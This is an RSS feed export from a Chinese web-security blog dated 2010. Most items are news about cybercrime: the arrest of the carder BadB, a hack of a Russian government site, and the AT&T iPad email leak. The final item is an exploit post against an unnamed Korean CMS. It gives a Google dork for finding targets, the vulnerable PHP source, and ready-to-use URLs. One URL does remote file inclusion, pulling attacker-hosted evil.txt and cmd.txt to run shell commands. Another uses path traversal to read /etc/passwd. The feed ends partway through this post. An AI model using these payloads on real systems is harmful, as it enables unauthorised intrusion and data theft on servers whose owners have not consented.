<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>0x50sec.org</title>
	<atom:link href="http://www.0x50sec.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.0x50sec.org</link>
	<description>Focus on web security!</description>
	<lastBuildDate>Sun, 29 Aug 2010 13:06:33 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>全球五大网络骇客之一BadB被捕</title>
		<link>http://www.0x50sec.org/%e5%85%a8%e7%90%83%e4%ba%94%e5%a4%a7%e7%bd%91%e7%bb%9c%e9%aa%87%e5%ae%a2%e4%b9%8b%e4%b8%80badb%e8%a2%ab%e6%8d%95/</link>
		<comments>http://www.0x50sec.org/%e5%85%a8%e7%90%83%e4%ba%94%e5%a4%a7%e7%bd%91%e7%bb%9c%e9%aa%87%e5%ae%a2%e4%b9%8b%e4%b8%80badb%e8%a2%ab%e6%8d%95/#comments</comments>
		<pubDate>Sun, 29 Aug 2010 13:06:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[骇客]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=928</guid>
		<description><![CDATA[美国司法部上周发表的一份声明称，全球最危险、最精明的五大网络犯罪分子之一BadB，本月早些时候在法国旅游期间被法国警方逮捕。预计他很快就会 被法国法庭提审，并且可能会被判决引渡到美国。如果被判欺诈和身份盗窃罪名成立，BadB将被判最多12年刑役和50万美元的罚款。然而，作为全球头号电 脑罪犯，他至少在莫斯科自由地生活了9个月的时间。 在互联网上，BadB大名鼎鼎，尽管遭到美国情报部门的围追堵截，但他仍能纵横在虚拟的世界中，盗取和出售大量信用卡号。在现实的世界里，他几乎不 可能被抓住，因为他居住在俄罗斯。BadB的真名叫Vladislav AHorohorin，他的落网让我们得以一窥俄罗斯黑客世界的真实情况，那些俄罗斯黑客大多受过良好教育，有些还是极具创造力的程序员，对网络贸易构成 了巨大的安全威胁。 由于能力上的不足、机构腐败或民族自豪感等种种原因，俄罗斯执法部门一直不愿抓捕这些才华横溢的网络欺诈罪犯。 据美国特工处调查副主管Michael PMerritt发表的一份声明称，在这种环境下，BadB的网络逐渐脱颖而出，成为全球最复杂的网络金融犯罪组织之一。 早在2009年 11月的时候，美国华盛顿司法部长办公室就曾在一项秘密指控中认定BadB就是Horohorin，当时Horohorin年仅27 岁，拥有乌克兰和以色列国籍，长期定居在莫斯科。直到今年8月7日，Horohorin才在旅法期间在法国南部奈斯机场登机返回俄罗斯的时候被美国委托法 国警方逮捕。美国特工处于8月11日发表声明，对Horohorin提出不公开指控。美国特工处发言人Max Milien称，特工处不会就决定在法国逮捕Horohorin一事发表评论。 国际刑警组织俄罗斯办公司发言人Olga KShklyarova称，美国执法机构没有要求国际刑警组织俄罗斯办公司在俄罗斯逮捕Horohorin。她说：“我们没有接到过这样的要求。”据美国 特工处发表的声明称，Horohorin为黑客们管理着大量网站，他们窃取了大量信用卡号并且匿名在全球各地销售。购买那些信用卡资料的人在使用欺诈账单 时要冒更大的风险，那些信用卡资料都是在一些名为CarderPlanet的网站上转手的，付费则通过一家类似于PayPal的俄罗斯网络付费系统 Webmoney间接完成。 许多俄罗斯电脑罪犯都宣扬民族主义，在Horohorin出售其窃取的美国信用卡数据的某个网站上，还放置了一段俄罗斯总理普京向俄罗斯黑客授勋的动画片。网站用英语打出的口号称：“我们等你来共同对抗美帝国主义。” Horohorin 一直自由居住在莫斯科。据俄罗斯电子通信协会发言人Dmitri Zakharov称，Horohorin是以外国人的身份在俄罗斯警方注册的。在俄罗斯，很少有人因为电脑犯罪而被捕，即使居住的俄罗斯的黑客已经被公开 确定为外国电脑犯罪组织的成员也不会被捕。 美国联邦调查局在2002年以虚假求职面试邀约的方式将一位名叫Vasily Gorshkov的嫌疑犯引渡到美国，而没有向俄罗斯警方求助。 为了获取案件的证据，联邦调查局电脑专家攻破了Gorshkov在俄罗斯的电脑。这一系列事件曝光后，俄罗斯当局对此表示极度愤怒。 Zakharov说，在线欺诈并不是俄罗斯警方的优先打击罪案，因为大多数在线欺诈的对象都是欧洲或美国的电脑用户。他说：“这就是俄罗斯的垃圾邮件发送者不会被逮捕的主要原因。” 这其中也有一定的政治因素。 俄罗斯研究机构信息安全研究所（the Institute of Information Security）副所长Vladimir Sokolov称，尽管美国和俄罗斯在认定和对待计算机安全基本问题上的差异正在缩小，但是双方仍存在一定争议。美国认为计算机安全是一项执法事务，是执 法机关的责任。 俄罗斯则奉行国际条约，即只对军方或谍报机关使用网络武器进行监管。 去年，美国开启了一项谈判，但它仍迫切要求两国更进一步地开展执法合作。 美国计算机安全研究界则提出了更悲观的假设，他们认为俄罗斯情报机关已经与计算机网络罪犯展开合作，情报机关为俄罗斯网络罪犯提供保护，作为交换，网络罪犯则为情报机关提供专业技术服务或出于政治目的利用他们的傀儡网络对持不同政见的网站发起攻击。 以前，网络攻击造成的损失都是很快见效的。 比如，一年前，一批黑客利用傀儡网络向格鲁吉亚的一家政治博客网站的社群网帐户发送了大量垃圾信息。但是后来那次攻击最终失控并导致Twitter的全球 服务中断，Facebook和LiveJournal的服务也受到了影响，全球共有数千万计算机用户受到影响。俄罗斯当局多次否认政府与这种攻击有关联。 Spamhaus 称，全球前10大垃圾邮件发送者有7人居住在前苏联地区，包括乌克兰、俄罗斯和爱沙尼亚等。更糟糕的是，西方执法机关已经发现一段 专为攻击银行网站的软件代码。2007年，瑞典安全专家发现一位绰号叫Corpse的俄罗斯黑客就是某个病毒的作者，那个病毒可记录用户电脑的键盘操作， 从而窃取瑞典银行Nordea的账户密码。失窃账户共损失了大约100万美元。 自从Horohorin被捕，badb.biz网站就一直处于关闭状态。但是至少在周一的时候，另一家名为carder.su的CarderPlanet网站仍处于正常营业状态。]]></description>
			<content:encoded><![CDATA[<p>美国司法部上周发表的一份声明称，全球最危险、最精明的五大网络犯罪分子之一BadB，本月早些时候在法国旅游期间被法国警方逮捕。预计他很快就会 被法国法庭提审，并且可能会被判决引渡到美国。如果被判欺诈和身份盗窃罪名成立，BadB将被判最多12年刑役和50万美元的罚款。然而，作为全球头号电 脑罪犯，他至少在莫斯科自由地生活了9个月的时间。</p>
<p>在互联网上，BadB大名鼎鼎，尽管遭到美国情报部门的围追堵截，但他仍能纵横在虚拟的世界中，盗取和出售大量信用卡号。在现实的世界里，他几乎不 可能被抓住，因为他居住在俄罗斯。BadB的真名叫Vladislav AHorohorin，他的落网让我们得以一窥俄罗斯黑客世界的真实情况，那些俄罗斯黑客大多受过良好教育，有些还是极具创造力的程序员，对网络贸易构成 了巨大的安全威胁。<span id="more-928"></span></p>
<p>由于能力上的不足、机构腐败或民族自豪感等种种原因，俄罗斯执法部门一直不愿抓捕这些才华横溢的网络欺诈罪犯。 据美国特工处调查副主管Michael PMerritt发表的一份声明称，在这种环境下，BadB的网络逐渐脱颖而出，成为全球最复杂的网络金融犯罪组织之一。</p>
<p>早在2009年 11月的时候，美国华盛顿司法部长办公室就曾在一项秘密指控中认定BadB就是Horohorin，当时Horohorin年仅27 岁，拥有乌克兰和以色列国籍，长期定居在莫斯科。直到今年8月7日，Horohorin才在旅法期间在法国南部奈斯机场登机返回俄罗斯的时候被美国委托法 国警方逮捕。美国特工处于8月11日发表声明，对Horohorin提出不公开指控。美国特工处发言人Max Milien称，特工处不会就决定在法国逮捕Horohorin一事发表评论。</p>
<p>国际刑警组织俄罗斯办公司发言人Olga KShklyarova称，美国执法机构没有要求国际刑警组织俄罗斯办公司在俄罗斯逮捕Horohorin。她说：“我们没有接到过这样的要求。”据美国 特工处发表的声明称，Horohorin为黑客们管理着大量网站，他们窃取了大量信用卡号并且匿名在全球各地销售。购买那些信用卡资料的人在使用欺诈账单 时要冒更大的风险，那些信用卡资料都是在一些名为CarderPlanet的网站上转手的，付费则通过一家类似于PayPal的俄罗斯网络付费系统 Webmoney间接完成。</p>
<p>许多俄罗斯电脑罪犯都宣扬民族主义，在Horohorin出售其窃取的美国信用卡数据的某个网站上，还放置了一段俄罗斯总理普京向俄罗斯黑客授勋的动画片。网站用英语打出的口号称：“我们等你来共同对抗美帝国主义。”</p>
<p>Horohorin 一直自由居住在莫斯科。据俄罗斯电子通信协会发言人Dmitri Zakharov称，Horohorin是以外国人的身份在俄罗斯警方注册的。在俄罗斯，很少有人因为电脑犯罪而被捕，即使居住的俄罗斯的黑客已经被公开 确定为外国电脑犯罪组织的成员也不会被捕。</p>
<p>美国联邦调查局在2002年以虚假求职面试邀约的方式将一位名叫Vasily Gorshkov的嫌疑犯引渡到美国，而没有向俄罗斯警方求助。 为了获取案件的证据，联邦调查局电脑专家攻破了Gorshkov在俄罗斯的电脑。这一系列事件曝光后，俄罗斯当局对此表示极度愤怒。</p>
<p>Zakharov说，在线欺诈并不是俄罗斯警方的优先打击罪案，因为大多数在线欺诈的对象都是欧洲或美国的电脑用户。他说：“这就是俄罗斯的垃圾邮件发送者不会被逮捕的主要原因。”</p>
<p>这其中也有一定的政治因素。 俄罗斯研究机构信息安全研究所（the Institute of Information Security）副所长Vladimir Sokolov称，尽管美国和俄罗斯在认定和对待计算机安全基本问题上的差异正在缩小，但是双方仍存在一定争议。美国认为计算机安全是一项执法事务，是执 法机关的责任。 俄罗斯则奉行国际条约，即只对军方或谍报机关使用网络武器进行监管。 去年，美国开启了一项谈判，但它仍迫切要求两国更进一步地开展执法合作。</p>
<p>美国计算机安全研究界则提出了更悲观的假设，他们认为俄罗斯情报机关已经与计算机网络罪犯展开合作，情报机关为俄罗斯网络罪犯提供保护，作为交换，网络罪犯则为情报机关提供专业技术服务或出于政治目的利用他们的傀儡网络对持不同政见的网站发起攻击。</p>
<p>以前，网络攻击造成的损失都是很快见效的。 比如，一年前，一批黑客利用傀儡网络向格鲁吉亚的一家政治博客网站的社群网帐户发送了大量垃圾信息。但是后来那次攻击最终失控并导致Twitter的全球 服务中断，Facebook和LiveJournal的服务也受到了影响，全球共有数千万计算机用户受到影响。俄罗斯当局多次否认政府与这种攻击有关联。</p>
<p>Spamhaus 称，全球前10大垃圾邮件发送者有7人居住在前苏联地区，包括乌克兰、俄罗斯和爱沙尼亚等。更糟糕的是，西方执法机关已经发现一段 专为攻击银行网站的软件代码。2007年，瑞典安全专家发现一位绰号叫Corpse的俄罗斯黑客就是某个病毒的作者，那个病毒可记录用户电脑的键盘操作， 从而窃取瑞典银行Nordea的账户密码。失窃账户共损失了大约100万美元。</p>
<p>自从Horohorin被捕，badb.biz网站就一直处于关闭状态。但是至少在周一的时候，另一家名为carder.su的CarderPlanet网站仍处于正常营业状态。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e5%85%a8%e7%90%83%e4%ba%94%e5%a4%a7%e7%bd%91%e7%bb%9c%e9%aa%87%e5%ae%a2%e4%b9%8b%e4%b8%80badb%e8%a2%ab%e6%8d%95/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>俄罗斯联邦警卫局网站被黑客攻击</title>
		<link>http://www.0x50sec.org/%e4%bf%84%e7%bd%97%e6%96%af%e8%81%94%e9%82%a6%e8%ad%a6%e5%8d%ab%e5%b1%80%e7%bd%91%e7%ab%99%e8%a2%ab%e9%bb%91%e5%ae%a2%e6%94%bb%e5%87%bb/</link>
		<comments>http://www.0x50sec.org/%e4%bf%84%e7%bd%97%e6%96%af%e8%81%94%e9%82%a6%e8%ad%a6%e5%8d%ab%e5%b1%80%e7%bd%91%e7%ab%99%e8%a2%ab%e9%bb%91%e5%ae%a2%e6%94%bb%e5%87%bb/#comments</comments>
		<pubDate>Sun, 29 Aug 2010 12:46:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=925</guid>
		<description><![CDATA[（国际在线）据德国《焦点》杂志8月24日报道，不明黑客23日袭击了俄罗斯联邦警卫局网站，造成网站数小时内众多文件网上曝光。联邦警卫局向国际文传电讯社披露了这一事件，目前事件正在调查中。 联邦警卫局声称，这个网站没有涉及国家机关秘密的信息，不过仍需要对此事件造成的影响进行评估。 俄罗斯联邦警卫局是保护国家高级领导人如总统梅德韦杰夫和总理普京安全的机构，另外，还负责莫斯科红场以及那里的列宁陵墓的安全。]]></description>
			<content:encoded><![CDATA[<p>（国际在线）据德国《焦点》杂志8月24日报道，不明黑客23日袭击了俄罗斯联邦警卫局网站，造成网站数小时内众多文件网上曝光。联邦警卫局向国际文传电讯社披露了这一事件，目前事件正在调查中。</p>
<p>联邦警卫局声称，这个网站没有涉及国家机关秘密的信息，不过仍需要对此事件造成的影响进行评估。 俄罗斯联邦警卫局是保护国家高级领导人如总统梅德韦杰夫和总理普京安全的机构，另外，还负责莫斯科红场以及那里的列宁陵墓的安全。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e4%bf%84%e7%bd%97%e6%96%af%e8%81%94%e9%82%a6%e8%ad%a6%e5%8d%ab%e5%b1%80%e7%bd%91%e7%ab%99%e8%a2%ab%e9%bb%91%e5%ae%a2%e6%94%bb%e5%87%bb/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>骇世黑客TXT下载</title>
		<link>http://www.0x50sec.org/%e9%aa%87%e4%b8%96%e9%bb%91%e5%ae%a2txt%e4%b8%8b%e8%bd%bd/</link>
		<comments>http://www.0x50sec.org/%e9%aa%87%e4%b8%96%e9%bb%91%e5%ae%a2txt%e4%b8%8b%e8%bd%bd/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 03:52:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[骇世黑客]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=915</guid>
		<description><![CDATA[以前读过现在找来～～～什么也不说了。 骇世黑客 □ 作者：余开亮、张兵 来源网络，如侵犯作者版权，请告知。 目　录 第一章 罪犯抑或牛仔：黑客文化略谈 第二章天才与鬼才之间：黑客精英轶事(1) 第二章天才与鬼才之间：黑客精英轶事(2) 第三章潘多拉的魔盒：黑客与计算机的病毒情缘 第四章时代双娇：黑客与网站的龙虎风云 第五章禁区的幽灵：黑客对政府权威机构的入侵（1） 第五章禁区的幽灵：黑客对政府权威机构的入侵（2） 第六章黑客帝国的无辜者：受黑的民用机构 第七章网络新危机：黑客经济犯罪透视(1) 第七章网络新危机：黑客经济犯罪透视(2) 第八章敞开的所罗门魔瓶：网络空间的色情传播 第九章网络无界人有界：黑客的民族情结 第十章无硝烟的战争：黑客与现代信息战 附录 后记 简体中文TXT下载地址:骇世黑客]]></description>
			<content:encoded><![CDATA[<p>以前读过现在找来～～～什么也不说了。</p>
<p>骇世黑客</p>
<p>□ 作者：余开亮、张兵</p>
<p>来源网络，如侵犯作者版权，请告知。</p>
<p>目　录<br />
第一章 罪犯抑或牛仔：黑客文化略谈<br />
第二章天才与鬼才之间：黑客精英轶事(1)<br />
第二章天才与鬼才之间：黑客精英轶事(2)<br />
第三章潘多拉的魔盒：黑客与计算机的病毒情缘<br />
第四章时代双娇：黑客与网站的龙虎风云<br />
第五章禁区的幽灵：黑客对政府权威机构的入侵（1）<br />
第五章禁区的幽灵：黑客对政府权威机构的入侵（2）<br />
第六章黑客帝国的无辜者：受黑的民用机构<br />
第七章网络新危机：黑客经济犯罪透视(1)<br />
第七章网络新危机：黑客经济犯罪透视(2)<br />
第八章敞开的所罗门魔瓶：网络空间的色情传播<br />
第九章网络无界人有界：黑客的民族情结<br />
第十章无硝烟的战争：黑客与现代信息战<br />
附录<br />
后记</p>
<p>简体中文TXT下载地址:<a href="http://www.0x50sec.org/wp-content/uploads/2010/06/hacker-stories.txt">骇世黑客</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e9%aa%87%e4%b8%96%e9%bb%91%e5%ae%a2txt%e4%b8%8b%e8%bd%bd/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>黑客称不会外泄信息 AT&amp;T安全漏洞谁负责</title>
		<link>http://www.0x50sec.org/%e9%bb%91%e5%ae%a2%e7%a7%b0%e4%b8%8d%e4%bc%9a%e5%a4%96%e6%b3%84%e4%bf%a1%e6%81%af-att%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e8%b0%81%e8%b4%9f%e8%b4%a3/</link>
		<comments>http://www.0x50sec.org/%e9%bb%91%e5%ae%a2%e7%a7%b0%e4%b8%8d%e4%bc%9a%e5%a4%96%e6%b3%84%e4%bf%a1%e6%81%af-att%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e8%b0%81%e8%b4%9f%e8%b4%a3/#comments</comments>
		<pubDate>Fri, 18 Jun 2010 09:03:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[AT&T]]></category>
		<category><![CDATA[iPad]]></category>
		<category><![CDATA[外泄]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=912</guid>
		<description><![CDATA[来源:天极网新闻频道　作者：张清 原文:http://news.yesky.com/231/11377231.shtml 据国外媒体报道，FBI已经介入调查iPad用户电子邮件信息泄露事件。但其中疑点重重，事情远远尚未结束。 6月10日，据外国媒体报导，电信运营商AT&#38;T为苹果iPad提供无线网络服务的网站存在安全漏洞，该漏洞使得14.4万名iPad 用户的电子邮箱地址等隐私被泄露。因为苹果公司要求用户必须用电邮形式在AT&#38;T网站上注册并激活iPad，因此AT&#38;T网站存有大量 iPad用户信息。一个黑客组织Gotase Security9日宣布，他们利用AT&#38;T的网站漏洞，获得约11.4万个iPad用户的邮件地址，而且还获得这些用户的身份识别码。 该组织通过发送包含iPad SIM卡序号的HTTP要求，使得AT&#38;T网站误判而暴露了用户的邮箱地址，这些序号(称为ICC-ID)则是采用连续码产生。AT&#38;T 周二紧急关闭了这项提供邮箱地址的服务，此后一天科技博客Valleywag首次报道了这一事件。 事后Gotase Security组织发言称他们的行为是合乎道德的，并未违反法律，且完全是为了维护公共利益，因为可以避免AT&#38;T的客户的资料遭受真正的恶意盗取。 据悉，被泄露了电邮地址的用户包括白宫办公厅主任拉姆·伊曼纽尔、纽约市长迈克尔·布隆伯格，《纽约时报》、《时代》杂志、新闻集团等传媒巨头首席执行官，联邦航空局、国土安全部、国家航空航天局员工，多家金融机构员工，以及空军上校威廉·埃尔德里奇。 AT&#38;T宣布他们已经于9号修补好了该漏洞，但是事情还远远没有结束，有更多的媒体和博客就此事情进行了进一步探讨，内容主要围绕一个责任问题——不管是苹果还是AT&#38;T，或者Gotase Security组织都应对此有一个解释。不过现在除了Gotase Security 和Valleywag一直在谈论此事情，AT&#38;T和苹果公司都保持缄默，FBI相关调查人员也拒绝透露进一步消息。 这样严重的一个安全漏洞造成的影响是不可预测的。FBI害怕这样的计算机入侵事件会对国家安全构成威胁，开始调查潜在的网络威胁。 Valleywag声称FBI已经要求该博客安全保留Gotase Security透露给它的隐私信息。 那么回溯整个过程，Gotase Security 声称“完全是为了维护公共利益”，那么在Gotase Security组织把相关信息透露给Valleywag博客，并且让全世界都知道AT&#38;T存在安全漏洞之前，是否已经通知了AT&#38;T这个问题呢？Valleywag博客为Gawker Media拥有，Gawker Media旗下的Gizmodo博客曾经曝光苹果iPhone4遗失事件。 Gotase Security周四晚上发声明说尽管他们没有通知AT&#38;T，但是他们确保会有人通风报信，在相关信息到达Valleywag博客之前 AT&#38;T能修补上漏洞。“我们没兴趣直接与AT&#38;T接触，但是在披露之前我们非常有耐心的等待他们‘做好自家内务，修好自家漏洞’，并且我们没有通过这件事情榨取一分钱。只有一个Gawker的记者看到了这些信息，并且这些信息进行了一些编辑才登出。” Goatse 还说“我们所有数据的收集都是通过一个没有密码的公共网络服务器，网上的任何人都可以进入，我们的行为没有违法，没有入侵，没有渗透”，“我们没有把你的信息出售给垃圾邮件发送者，我们更没有试图攻击你的iPad。相反你的ipad正因为我们而更安全。” “我们需要做出这些澄清，iPad 3G的用户有权利知道他们的信息不安全而及时采取措施。”Goatse表示。 那么整个过程究竟谁该负责任呢？显然Gotase Security给AT&#38;T上了一堂惊险又窘迫的“安全课程”，AT&#38;T在登记用户信息方面应该采取一种新的方法，AT&#38;T可能想让用户在注册时更简单一些，但是却忽略了安全隐患，这是AT&#38;T的失职。Gotase Security这种方式当然不会被提倡，何况真真假假虚虚实实之中，谁也不能保障说“被暴露的用户隐私信息目前及以后都是安全的”。经历此事件之后，苹果这些公司应该会更加关注网络运营商在用户信息注册方面的流程，毕竟以个人邮件方式在网络上注册和激活产品需要更加安全的保护措施。 关于此事件的进一步信息还需要等待FBI的进一步调查。]]></description>
			<content:encoded><![CDATA[<p>来源:天极网新闻频道　作者：张清</p>
<p>原文:http://news.yesky.com/231/11377231.shtml</p>
<p>据国外媒体报道，FBI已经介入调查iPad用户电子邮件信息泄露事件。但其中疑点重重，事情远远尚未结束。</p>
<p>6月10日，据外国媒体报导，电信运营商AT&amp;T为苹果iPad提供无线网络服务的网站存在安全漏洞，该漏洞使得14.4万名iPad 用户的电子邮箱地址等隐私被泄露。因为苹果公司要求用户必须用电邮形式在AT&amp;T网站上注册并激活iPad，因此AT&amp;T网站存有大量 iPad用户信息。一个黑客组织Gotase Security9日宣布，他们利用AT&amp;T的网站漏洞，获得约11.4万个iPad用户的邮件地址，而且还获得这些用户的身份识别码。</p>
<p>该组织通过发送包含iPad SIM卡序号的HTTP要求，使得AT&amp;T网站误判而暴露了用户的邮箱地址，这些序号(称为ICC-ID)则是采用连续码产生。AT&amp;T 周二紧急关闭了这项提供邮箱地址的服务，此后一天科技博客Valleywag首次报道了这一事件。<br />
<span id="more-912"></span><br />
事后Gotase Security组织发言称他们的行为是合乎道德的，并未违反法律，且完全是为了维护公共利益，因为可以避免AT&amp;T的客户的资料遭受真正的恶意盗取。</p>
<p>据悉，被泄露了电邮地址的用户包括白宫办公厅主任拉姆·伊曼纽尔、纽约市长迈克尔·布隆伯格，《纽约时报》、《时代》杂志、新闻集团等传媒巨头首席执行官，联邦航空局、国土安全部、国家航空航天局员工，多家金融机构员工，以及空军上校威廉·埃尔德里奇。</p>
<p>AT&amp;T宣布他们已经于9号修补好了该漏洞，但是事情还远远没有结束，有更多的媒体和博客就此事情进行了进一步探讨，内容主要围绕一个责任问题——不管是苹果还是AT&amp;T，或者Gotase Security组织都应对此有一个解释。不过现在除了Gotase Security 和Valleywag一直在谈论此事情，AT&amp;T和苹果公司都保持缄默，FBI相关调查人员也拒绝透露进一步消息。</p>
<p>这样严重的一个安全漏洞造成的影响是不可预测的。FBI害怕这样的计算机入侵事件会对国家安全构成威胁，开始调查潜在的网络威胁。 Valleywag声称FBI已经要求该博客安全保留Gotase Security透露给它的隐私信息。</p>
<p>那么回溯整个过程，Gotase Security 声称“完全是为了维护公共利益”，那么在Gotase Security组织把相关信息透露给Valleywag博客，并且让全世界都知道AT&amp;T存在安全漏洞之前，是否已经通知了AT&amp;T这个问题呢？Valleywag博客为Gawker Media拥有，Gawker Media旗下的Gizmodo博客曾经曝光苹果iPhone4遗失事件。</p>
<p>Gotase Security周四晚上发声明说尽管他们没有通知AT&amp;T，但是他们确保会有人通风报信，在相关信息到达Valleywag博客之前 AT&amp;T能修补上漏洞。“我们没兴趣直接与AT&amp;T接触，但是在披露之前我们非常有耐心的等待他们‘做好自家内务，修好自家漏洞’，并且我们没有通过这件事情榨取一分钱。只有一个Gawker的记者看到了这些信息，并且这些信息进行了一些编辑才登出。”</p>
<p>Goatse 还说“我们所有数据的收集都是通过一个没有密码的公共网络服务器，网上的任何人都可以进入，我们的行为没有违法，没有入侵，没有渗透”，“我们没有把你的信息出售给垃圾邮件发送者，我们更没有试图攻击你的iPad。相反你的ipad正因为我们而更安全。”</p>
<p>“我们需要做出这些澄清，iPad 3G的用户有权利知道他们的信息不安全而及时采取措施。”Goatse表示。</p>
<p>那么整个过程究竟谁该负责任呢？显然Gotase Security给AT&amp;T上了一堂惊险又窘迫的“安全课程”，AT&amp;T在登记用户信息方面应该采取一种新的方法，AT&amp;T可能想让用户在注册时更简单一些，但是却忽略了安全隐患，这是AT&amp;T的失职。Gotase Security这种方式当然不会被提倡，何况真真假假虚虚实实之中，谁也不能保障说“被暴露的用户隐私信息目前及以后都是安全的”。经历此事件之后，苹果这些公司应该会更加关注网络运营商在用户信息注册方面的流程，毕竟以个人邮件方式在网络上注册和激活产品需要更加安全的保护措施。</p>
<p>关于此事件的进一步信息还需要等待FBI的进一步调查。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e9%bb%91%e5%ae%a2%e7%a7%b0%e4%b8%8d%e4%bc%9a%e5%a4%96%e6%b3%84%e4%bf%a1%e6%81%af-att%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e8%b0%81%e8%b4%9f%e8%b4%a3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>韩国某cms远程包含、注射、文件泄漏、上传等多个漏洞</title>
		<link>http://www.0x50sec.org/%e9%9f%a9%e5%9b%bd%e6%9f%90cms%e8%bf%9c%e7%a8%8b%e5%8c%85%e5%90%ab%e3%80%81%e6%b3%a8%e5%b0%84%e3%80%81%e6%96%87%e4%bb%b6%e6%b3%84%e6%bc%8f%e3%80%81%e4%b8%8a%e4%bc%a0%e7%ad%89%e5%a4%9a%e4%b8%aa/</link>
		<comments>http://www.0x50sec.org/%e9%9f%a9%e5%9b%bd%e6%9f%90cms%e8%bf%9c%e7%a8%8b%e5%8c%85%e5%90%ab%e3%80%81%e6%b3%a8%e5%b0%84%e3%80%81%e6%96%87%e4%bb%b6%e6%b3%84%e6%bc%8f%e3%80%81%e4%b8%8a%e4%bc%a0%e7%ad%89%e5%a4%9a%e4%b8%aa/#comments</comments>
		<pubDate>Thu, 17 Jun 2010 06:54:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[漏洞代码]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[exp]]></category>
		<category><![CDATA[rfi]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=909</guid>
		<description><![CDATA[来源:0x50sec.org 无意中发现的，名字未知，版本不详，问题一堆 Google Dork: inurl:bbs_sun/board.php board.php文件内容如下: &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; &#60;? if(!$admin) $pgUp .= &#8220;../&#8221;; else if($admin==&#8217;N') $pgUp .= &#8220;&#8221;; include $pgUp.&#8221;inc/dbconn.php&#8221;; include $pgUp.&#8221;bbs_sun/config.php&#8221;; ?&#62; &#60;link href=&#8221;&#60;?=$skinSrc?&#62;/style.css&#8221; rel=&#8221;stylesheet&#8221; type=&#8221;text/css&#8221;&#62; &#60;? if($mode == &#8220;list&#8221;) include ($skinSrc.&#8221;/list.php&#8221;); else if($mode == &#8220;write&#8221; &#124;&#124; $mode == &#8220;modify&#8221; &#124;&#124; $mode == &#8220;reply&#8221;) include ($skinSrc.&#8221;/write.php&#8221;); else if($mode == &#8220;view&#8221;) include ($skinSrc.&#8221;/view.php&#8221;); else if($mode == [...]]]></description>
			<content:encoded><![CDATA[<p>来源:0x50sec.org</p>
<p>无意中发现的，名字未知，版本不详，问题一堆</p>
<p>Google Dork: inurl:bbs_sun/board.php</p>
<p>board.php文件内容如下:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&lt;?<br />
if(!$admin) $pgUp .= &#8220;../&#8221;;<br />
else if($admin==&#8217;N') $pgUp .= &#8220;&#8221;;</p>
<p>include $pgUp.&#8221;inc/dbconn.php&#8221;;<br />
include $pgUp.&#8221;bbs_sun/config.php&#8221;;<br />
?&gt;</p>
<p>&lt;link href=&#8221;&lt;?=$skinSrc?&gt;/style.css&#8221; rel=&#8221;stylesheet&#8221; type=&#8221;text/css&#8221;&gt;<br />
&lt;?<br />
if($mode == &#8220;list&#8221;) include ($skinSrc.&#8221;/list.php&#8221;);<br />
else if($mode == &#8220;write&#8221; || $mode == &#8220;modify&#8221; || $mode == &#8220;reply&#8221;) include ($skinSrc.&#8221;/write.php&#8221;);<br />
else if($mode == &#8220;view&#8221;) include ($skinSrc.&#8221;/view.php&#8221;);<br />
else if($mode == &#8220;delete&#8221; || $mode == &#8220;ment_delete&#8221;) include ($skinSrc.&#8221;/delete.php&#8221;);<br />
?&gt;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><span id="more-909"></span></p>
<p>此处存在远程文件包含漏洞</p>
<p>EXP:</p>
<p>http://xxxx.kr/bbs_sun/board.php?admin=0x50sec.org&amp;pgUp=http://www.0x50sec.org/evil.txt?</p>
<p>board.php?admin=0x50sec.org&amp;pgUp=http://www.0x50sec.org/evil.txt?&amp;skinSrc=http://www.0x50sec.org/cmd.txt?&amp;cmd=id&amp;mode=view</p>
<p>有的含有download.php文件，对file变量和bname变量都没有进行必要的检查，导致文件泄漏漏洞:</p>
<p>EXP:</p>
<p>http://xxxx.kr/s_board_text/download.php?file=../../../../../etc/passwd&amp;bname=../</p>
